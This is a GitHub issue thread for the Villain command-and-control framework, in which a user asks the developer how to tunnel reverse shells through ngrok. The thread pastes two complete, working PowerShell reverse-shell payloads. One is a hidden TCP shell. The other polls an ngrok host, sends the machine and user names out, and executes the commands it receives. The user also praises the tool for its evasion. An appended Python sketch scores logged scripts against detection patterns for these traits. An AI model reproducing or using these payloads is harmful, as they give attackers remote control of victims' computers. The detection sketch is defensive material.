t3l3machus / Villain

Villain is a high level stage 0/1 C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells, enhance their functionality with additional features (commands, utilities) and share them among connected sibling servers (Villain instances running on different machines).

Help, on making recent version of Villain to work with ngrok #99

Closed CyberGopher closed 1 year ago

CyberGopher commented 1 year ago

I can't manage to make it work with ngrok, sir. The implementations you made on your YouTube channel https://www.youtube.com/watch?v=ubNUCvFOmwQ are different from a recent version of Villain, sir.

Start-Process $PSHOME\powershell.exe -ArgumentList {$client = New-Object System.Net.Sockets.TCPClient('192.168.160.4',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()} -WindowStyle Hidden

This type of payload doesn't have an HTTP option so I can put the ngrok link and use HTTPS, and also there is no ID of a shell or, say, "Authorization="$i on this payload so that I can implement an ngrok-skip-browser-warning and other stuff. I think you get the picture, sir.

I tried everything I know, but didn't win this situation. So here I am looking for help, sir. I don't know what the best way is for you to help me out, but I recommend you make another video using this kinda payload or, say, a recent version of Villain.

I appreciate the tool, man. You're great, you know what you're doing, I love the way you evade.

t3l3machus commented 1 year ago

This is a TCP reverse shell. In order to make it work with ngrok, you must follow the first example in the video I made, in which I start ngrok in TCP mode, then set a netcat listener and finally, replace the IP and port in the payload with the domain name provided by ngrok and the port that netcat (and ngrok) are set to listen on.

CyberGopher commented 1 year ago

I get you, sir, but there is this trick with ngrok. The recent version of ngrok nowadays doesn't give you a link and a particular port, it just gives you a domain name, that's all.

I tried to ping the domain link so I can get the IP of a domain, but the IP rotates, it changes every time you ping it.

And even trying to access any of those rotating IPs on their port 80 or 443, the domain doesn't resolve.

It's a tricky situation here bro

On Wed, 10 May 2023, 10:30 Panagiotis Chartas, @.***> wrote:

Closed #99 https://github.com/t3l3machus/Villain/issues/99 as completed.


CyberGopher commented 1 year ago

Hello man


t3l3machus commented 1 year ago

@CyberGopher I'll check it out soon and get back to you asap, thanks for letting me know

CyberGopher commented 1 year ago

Okay brother


CyberGopher commented 1 year ago

Hello brother


CyberGopher commented 1 year ago

Sir, help me out, tried everything I know, but I can manage to make ngrok work with Villain.

Sample:

$s='da83-77-246-52-187.ngrok-free.app';$i='king'; $p='https://'; $v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/king/$env:COMPUTERNAME/$env:USERNAME -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="asd"};while ($true){$c=(Invoke-RestMethod -UsebasicParsing -Uri $p$s/king -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="asd"}); if ($c -ne 'None') {$r=Invoke-Expression $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r; $x=Invoke-RestMethod -Uri $p$s/king -Method POST -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="asd"} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}}

If you have time, please help.

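A defender's view of the two payload styles posted in this thread, as an added example that is not part of the original thread or the Villain project: a Python sketch that scores PowerShell script block text (for example from Event ID 4104 logging) against the traits those payloads show. The indicator names, weights, threshold and sample strings are assumptions constructed for illustration.

```python
import re

# Indicator groups drawn from the payloads quoted in this thread.
# Names and weights are assumptions for illustration, not a vetted ruleset.
INDICATORS = {
    "tcp_client":    (r"new-object\s+(system\.)?net\.sockets\.tcpclient", 3),
    "remote_exec":   (r"\b(iex|invoke-expression)\b", 3),
    "http_poll":     (r"\b(irm|invoke-restmethod|invoke-webrequest)\b", 1),
    "poll_loop":     (r"while\s*\(", 1),
    "hidden_window": (r"-windowstyle\s+hidden", 2),
    "ngrok_host":    (r"[\w.-]+\.ngrok(-free)?\.(app|io)\b", 2),
    "ngrok_header":  (r"ngrok-skip-browser-warning", 3),
}
THRESHOLD = 6  # assumed cut-off: requires several independent traits

def normalize(script: str) -> str:
    """Lower-case, drop backtick escapes and collapse whitespace so that
    trivial formatting changes do not hide an indicator."""
    text = script.lower().replace("`", "")
    return re.sub(r"\s+", " ", text)

def score(script: str):
    """Return (total score, sorted list of matched indicator names)."""
    text = normalize(script)
    hits = [name for name, (rx, _) in INDICATORS.items() if re.search(rx, text)]
    return sum(INDICATORS[h][1] for h in hits), sorted(hits)

def is_suspicious(script: str) -> bool:
    return score(script)[0] >= THRESHOLD

# Constructed, abbreviated script-block samples (not functional code).
SAMPLES = {
    "tcp": "Start-Process powershell -ArgumentList {$c = New-Object "
           "System.Net.Sockets.TCPClient('host.example',443); while(...){ iex $data }} "
           "-WindowStyle Hidden",
    "http": "$v=Invoke-RestMethod -Uri https://sample.ngrok-free.app/x -Headers "
            "@{\"ngrok-skip-browser-warning\"=\"1\"}; while ($true){ I`EX $c }",
    "benign": "Invoke-RestMethod -Uri https://api.example.com/status | ConvertTo-Json",
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(name, is_suspicious(text), score(text))
```

A single indicator such as `Invoke-RestMethod` stays below the threshold, so routine administrative scripts are not flagged; the weights need tuning against a site's own script block logs before use.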